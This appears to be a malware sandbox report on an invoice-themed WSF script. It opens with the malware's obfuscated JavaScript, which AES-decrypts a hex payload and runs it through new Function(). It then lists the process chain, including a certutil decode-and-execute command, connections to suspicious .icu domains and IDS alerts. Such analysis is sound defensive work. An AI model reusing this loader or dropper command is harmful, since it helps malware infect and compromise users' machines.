a=n.fZuooDWaQu(a),n=n.tAjRFOtDJa,e.xrkoWLGoQF({ukAoslEzPa:a,key:v,yLIlTYUEdC:n.yLIlTYUEdC,RfuCsvEMIVrithm:r,jspwHIXzmY:n.jspwHIXzmY,ovnGHahhRt:n.ovnGHahhRt,xWmTEJzxuk:r.xWmTEJzxuk,HCvDohrvxQ:t.XCoXBEMuLA})},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),r.YTPIvGNUof(v,t).fZuooDWaQu(a.ukAoslEzPa)},_eMUXrzTNkg:function(r,a){return"string"==typeof r?a.eMUXrzTNkg(r,this):r}})),f=(f.kdf={}).pMgBTzEVtE={mxqauHfFCq:function(r,a,v,t){return t||(t=o.CqlccWGqHP(8)),r=n.xrkoWLGoQF({KzfiCbrnue:a+v}).IOaZMzuUuc(r,t),v=o.xrkoWLGoQF(r.eZRNeHSVmZ.slice(a),4*v),r.KlwuiHJXBf=4*a,e.xrkoWLGoQF({key:r,yLIlTYUEdC:v,salt:t})}},l=r.vaJXBqfphC=c.LBLCJIeRxa({tAjRFOtDJa:c.tAjRFOtDJa.LBLCJIeRxa({kdf:f}),PYbsXnmtJA:function(r,a,v,t){return v=(t=this.tAjRFOtDJa.LBLCJIeRxa(t)).kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX),t.yLIlTYUEdC=v.yLIlTYUEdC,(r=c.PYbsXnmtJA.call(this,r,a,v.key,t)).GYRmHplwNA(v),r},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),v=t.kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX,a.gwiUkDQFxZ),t.yLIlTYUEdC=v.yLIlTYUEdC,c.IXjSHElPSb.call(this,r,a,v.key,t)}})}(),function(){for(var 
r=NKBCmUHGeG,a=r.eazSwMHLnL.BlockSQaxnzYskL,v=r.RfuCsvEMIV,o=[],t=[],n=[],i=[],s=[],u=[],h=[],e=[],c=[],f=[],l=[],p=0;p<256;p++)l[p]=p<128?p<<1:p<<1^283;var g=0,d=0;for(p=0;p<256;p++){var k=(k=d^d<<1^d<<2^d<<3^d<<4)>>>8^255&k^99;o[g]=k;var y=l[t[k]=g],w=l[y],S=l[w],_=257*l[k]^16843008*k;n[g]=_<<24|_>>>8,i[g]=_<<16|_>>>16,s[g]=_<<8|_>>>24,u[g]=_,_=16843009*S^65537*w^257*y^16843008*g,h[k]=_<<24|_>>>8,e[k]=_<<16|_>>>16,c[k]=_<<8|_>>>24,f[k]=_,g?(g=y^l[l[l[S^y]]],d^=l[l[d]]):g=d=1}var B=[0,1,2,4,8,16,32,64,128,27,54];v=v.vWLWtnhNPM=a.LBLCJIeRxa({VDrUSIMlYF:function(){for(var r=(v=this.ujgXpnylwb).eZRNeHSVmZ,a=v.KlwuiHJXBf/4,v=4*((this._nRounds=a+6)+1),t=this.ujgXpnylwbSchedule=[],n=0;n<v;n++)if(n<a)t[n]=r[n];else{var i=t[n-1];n%a?6<a&&4==n%a&&(i=o[i>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i]):(i=o[(i=i<<8|i>>>24)>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i],i^=B[n/a|0]<<24),t[n]=t[n-a]^i}for(r=this.hpsQNEkfti=[],a=0;a<v;a++)n=v-a,i=a%4?t[n]:t[n-4],r[a]=a<4||n<=4?i:h[o[i>>>24]]^e[o[i>>>16&255]]^c[o[i>>>8&255]]^f[o[255&i]]},PYbsXnmtJABlock:function(r,a){this.hXOUXbKyiS(r,a,this.ujgXpnylwbSchedule,n,i,s,u,o)},IXjSHElPSbBlock:function(r,a){var v=r[a+1];r[a+1]=r[a+3],r[a+3]=v,this.hXOUXbKyiS(r,a,this.hpsQNEkfti,h,e,c,f,t),v=r[a+1],r[a+1]=r[a+3],r[a+3]=v},hXOUXbKyiS:function(r,a,v,t,n,i,o,s){for(var u=this._nRounds,h=r[a]^v[0],e=r[a+1]^v[1],c=r[a+2]^v[2],f=r[a+3]^v[3],l=4,p=1;p<u;p++){var 
g=t[h>>>24]^n[e>>>16&255]^i[c>>>8&255]^o[255&f]^v[l++],d=t[e>>>24]^n[c>>>16&255]^i[f>>>8&255]^o[255&h]^v[l++],k=t[c>>>24]^n[f>>>16&255]^i[h>>>8&255]^o[255&e]^v[l++];f=t[f>>>24]^n[h>>>16&255]^i[e>>>8&255]^o[255&c]^v[l++],h=g,e=d,c=k}g=(s[h>>>24]<<24|s[e>>>16&255]<<16|s[c>>>8&255]<<8|s[255&f])^v[l++],d=(s[e>>>24]<<24|s[c>>>16&255]<<16|s[f>>>8&255]<<8|s[255&h])^v[l++],k=(s[c>>>24]<<24|s[f>>>16&255]<<16|s[h>>>8&255]<<8|s[255&e])^v[l++],f=(s[f>>>24]<<24|s[h>>>16&255]<<16|s[e>>>8&255]<<8|s[255&c])^v[l++],r[a]=g,r[a+1]=d,r[a+2]=k,r[a+3]=f},KzfiCbrnue:8});r.vWLWtnhNPM=a.bvTMfLRMFS(v)}(),new Function(NKBCmUHGeG.vWLWtnhNPM.IXjSHElPSb("","\x34\x34\x32\x61\x35\x62\x66\x30\x61\x64\x36\x30\x34\x66\x34\x38\x35\x66\x63\x61\x32\x36\x66\x38\x37\x33\x35\x63\x32\x33\x36\x64\x35\x34\x33\x63\x66\x65\x33\x65\x34\x64\x61\x35\x61\x34\x34\x66\x38\x34\x62\x35\x65\x39\x34\x39\x34\x31\x65\x64\x38\x38\x61\x36",{XCoXBEMuLA:dtEDoFVfAj}).toString(NKBCmUHGeG.VmLLEtCkRa.IBEHHawlRa))();
No data.
All screenshots are available in the full report
Total processes: 46
Monitored processes: 8
Malicious processes: 2
Suspicious processes: 2

Behavior graph

Processes in the graph (in order shown): wscript.exe, cmd.exe, ping.exe, explorer.exe, cscript.exe, cscript.exe, cmd.exe, ping.exe

Process information

PID: 716
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Copy of Docs 68_204 INVO.WSF"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 2632
CMD: "C:\Windows\System32\cmd.exe" /c ping 1.1 -n 21 & cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead
Path: C:\Windows\System32\cmd.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3996
CMD: ping 1.1 -n 21
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2488
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2188
CMD: cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead
Path: C:\Windows\system32\cscript.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Console Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 3792
CMD: "C:\Windows\System32\cscript.exe" "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv?.wsf" Function RegRead
Path: C:\Windows\System32\cscript.exe
Parent process: cscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Console Based Script Host
Exit code: (none reported)
Version: 5.8.7600.16385

PID: 2240
CMD: "C:\Windows\System32\cmd.exe" /c ping 1.1.1.1 -n 120 & cd "C:\Users\admin\AppData\Roaming" && certutil -decode "evFzI6iZOm" "evFzI6iZOm2" && certutil -decode "evFzI6iZOm2" "evFzI6iZOm.exe" && explorer "evFzI6iZOm.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: cscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: (none reported)
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2208
CMD: ping 1.1.1.1 -n 120
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: (none reported)
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 381
Read events: 336
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 0
Text files: 5
Unknown types: 0

Dropped files

PID: 3792
Process: cscript.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\word[1].txt
Type: (not reported)
MD5: (not reported)
SHA256: (not reported)

PID: 3792
Process: cscript.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\0aaf0c56ae5396551dfa0589d5fda7abc37beea7e7d8d39b6901ffab66a493c09ecd4d69[1].txt
Type: text
MD5: 2BB4834348AD8C7CA5DE33C569E175D4
SHA256: 0AF1E9886832E35C63AD022EF7D89EF38313173A17AA0B66C2859BDD7F984F0C

PID: 2188
Process: cscript.exe
Filename: C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv
Type: xml
MD5: E8081971D97915187371190C7D5CEBD4
SHA256: 1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E

PID: 716
Process: WScript.exe
Filename: C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf
Type: xml
MD5: E8081971D97915187371190C7D5CEBD4
SHA256: 1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E

PID: 3792
Process: cscript.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@rapidssl[1].txt
Type: text
MD5: E5EECD8705F7E6228730DE0FD941769C
SHA256: FB70B30C85F3D9588F145623C701D60448CC7557D19E2BCBC761A87D0B250BC2

PID: 3792
Process: cscript.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@cloudown[1].txt
Type: text
MD5: 22AD25903920B63E49B74B9DB0E703F8
SHA256: CB3DB222BD0065F38897B77B2472838E592415AC88AFAF1F0A46353698DA7937
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID: 3792
Process: cscript.exe
IP: 104.28.28.55:443
Domain: certificate.rapidssl.icu
ASN: Cloudflare Inc
CN: US
Reputation: unknown

PID: 3792
Process: cscript.exe
IP: 104.28.0.94:443
Domain: docs.cloudown.icu
ASN: Cloudflare Inc
CN: US
Reputation: shared

DNS requests

Domain: docs.cloudown.icu
IP:
  • 104.28.0.94
  • 104.28.1.94
Reputation: suspicious

Domain: certificate.rapidssl.icu
IP:
  • 104.28.28.55
  • 104.28.29.55
Reputation: unknown

Threats

PID: (not attributed)
Process: (not attributed)
Class: Potentially Bad Traffic
Message: ET INFO DNS Query for Suspicious .icu Domain

PID: 3792
Process: cscript.exe
Class: Potentially Bad Traffic
Message: ET INFO Suspicious Domain (*.icu) in TLS SNI
No debug info